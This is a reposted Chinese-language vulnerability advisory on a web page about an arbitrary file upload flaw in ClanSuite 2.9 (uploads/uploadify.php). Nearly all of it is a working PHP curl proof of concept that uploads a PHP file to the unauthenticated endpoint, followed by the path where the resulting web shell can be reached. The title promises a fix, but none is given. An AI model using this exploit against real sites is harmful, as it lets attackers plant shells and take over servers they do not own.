首 页IT知识库翔宇问吧收藏本站
当前位置:翔宇亭IT乐园IT知识库电脑基础安全防护

ClanSuite 2.9任意文件上传漏洞及修复

减小字体 增大字体 作者:佚名  来源:转载整理  发布时间:2012-06-14 23:48:27

标题: ClanSuite 2.9 Arbitrary File Upload

发现者: Adrien Thierry

程序开发商http://clansuite.com/

下载地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/

影响版本: 2.9 and Trunk Revision 6400

缺陷地址 : uploads/uploadify.php

测试方法

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init("http:// www.biye5u.com /uploads/uploadify.php"); // Version 2.9
$c = curl_init("http:// www.biye5u.com /application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$u",
'name'=>"info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

shell位置:

http://www.XXX.com /uploads/temps/info.php

或者 http://www.XXX.com /application/uploads/temps/info.php

知识评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 1分

内 容:

            请注意用语文明且合法,不要发布带有攻击性、侮辱性的言论,谢谢合作!

         通知管理员 验证码:

关于本站 | 网站帮助 | 广告合作 | 网站声明 | 友情连接 | 网站地图 | 用户守则 | 联系我们 |
本站大多数内容来自互联网或网站会员发布,如有侵权,请来信告之,谢谢!
Copyright © 2007-2017 biye5u.com. All Rights Reserved.
网站备案号:黑ICP备13005378号-3